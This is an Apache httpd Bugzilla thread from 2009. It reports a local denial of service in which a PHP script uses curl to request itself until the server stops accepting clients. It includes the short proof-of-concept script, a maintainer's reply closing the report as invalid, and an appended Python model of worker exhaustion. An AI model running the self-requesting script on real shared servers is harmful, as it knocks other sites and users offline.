Posted to bugs@httpd.apache.org by bu...@apache.org on 2009/07/15 18:50:43 UTC
DO NOT REPLY [Bug 47536] New: Apacze local DOS/mod_php/mod_cgi
https://issues.apache.org/bugzilla/show_bug.cgi?id=47536
Summary: Apacze local DOS/mod_php/mod_cgi
Product: Apache httpd-2
Version: 2.2.11
Platform: PC
OS/Version: Linux
Status: NEW
Severity: normal
Priority: P2
Component: mod_cgi
AssignedTo: bugs@httpd.apache.org
ReportedBy: iforone@spof.pl
Hello,
I've found a bug in apache* server which makes a local DOS attack possible.
The attack consists in executing code (php** for example) which executes
itself and the server stops accepting new clients.
Vulnerable to attack are mod_php and mod_cgi.
It would appear that php made by mod_fastcgi is resistant (the server does not
accept new requests for the socket which we're attacking but the
rest works stable - in the situation when every site has its own socket,
someone who attacks can turn off 'his own' site only.)
The attack is not fine but no limits (process/memory/processor time limit) can
block it.
I managed to lead to the situation when 1 php process was blocking the server.
Software:
- HTTPD:
* apache-2.2.11
* apache-2.2.9
- OS:
* gentoo (linux-2.6.29/linux-2.6.27)
* freebsd (7.0)
- PHP:
* 5.2.10 (+suhosin)
* 5.2.9
POC:
-----------------------------------------------------------------
<?php
$url = $_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
echo $url;
if (!function_exists('curl_init'))
die("no curl");
$handle = curl_init("http://$url");
curl_setopt($handle, CURLOPT_USERAGENT, "www_agent");
curl_exec($handle);
curl_close($handle);
?>
-----------------------------------------------------------------
* It's hard for me to estimate if the possibility of carrying out the attack is
caused by 'weakness' of the server or php - if you think
that it's not the server's fault, please contact me.
** The attack was carried out with the aid of php, but I think that any code
(used as cgi) can DOS httpd.
If you need any additional information or think that it isn't a bug, please contact
me.
Yours sincerely,
Bartosz /zynzel/ Kupidura
--
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
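Added example (not part of the original report and not Apache httpd code): a toy Python model of the behaviour described above, comparing scripts run inside the server's own workers with a per-site backend pool. The fixed worker pool, the site names and the pool sizes are assumptions constructed for illustration.

```python
"""Toy model (constructed, not Apache code) of a script that requests itself.

Assumptions: the front server has a fixed number of workers; a worker stays
occupied until its request finishes; a site either runs scripts inside the
front worker (mod_php / mod_cgi style) or in its own fixed-size backend pool
reached over a per-site socket (the mod_fastcgi setup the report describes).
Blocked workers only wait on a socket, so CPU and memory are not modelled.
"""


def saturate(front_workers, backend_slots, looping_site):
    """Follow the self-request chain until it blocks; return the busy counts.

    backend_slots maps site -> pool size, or None when scripts run in-process.
    """
    front_busy = 0
    backend_busy = {site: 0 for site in backend_slots}
    while front_busy < front_workers:
        front_busy += 1                      # a front worker accepts the request
        limit = backend_slots[looping_site]
        if limit is not None:
            if backend_busy[looping_site] == limit:
                break                        # waits for a backend slot: chain stops
            backend_busy[looping_site] += 1
        # the script now runs and blocks on a nested request to itself
    return front_busy, backend_busy


def can_serve(site, front_workers, backend_slots, looping_site):
    """Would a new client of `site` be answered while the chain is blocked?"""
    front_busy, backend_busy = saturate(front_workers, backend_slots, looping_site)
    if front_busy >= front_workers:
        return False                         # no front worker left to accept
    limit = backend_slots[site]
    return limit is None or backend_busy[site] < limit


if __name__ == "__main__":
    in_process = {"site_a": None, "site_b": None}   # constructed sample sites
    per_site = {"site_a": 3, "site_b": 3}
    for label, slots in (("in-process", in_process), ("per-site pool", per_site)):
        for site in slots:
            ok = can_serve(site, 8, slots, looping_site="site_a")
            print(f"{label:14} {site}: {'served' if ok else 'stalled'}")
```

In this model the per-site pool confines the stall only while it is smaller than the number of front workers; a backend pool at least as large lets the chain occupy every front worker again.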
DO NOT REPLY [Bug 47536] Apache local DOS/mod_php/mod_cgi
Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=47536
Dan Poirier <po...@pobox.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Status|NEW |RESOLVED
Resolution| |INVALID
--- Comment #1 from Dan Poirier <po...@pobox.com> 2009-09-23 10:09:18 PDT ---
It's not really an Apache bug if somebody writes a PHP script with infinite
recursion. The solution is not to do that.
DO NOT REPLY [Bug 47536] Apache local DOS/mod_php/mod_cgi
Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=47536
iforone@spof.pl changed:
What |Removed |Added
----------------------------------------------------------------------------
Summary|Apacze local |Apache local
|DOS/mod_php/mod_cgi |DOS/mod_php/mod_cgi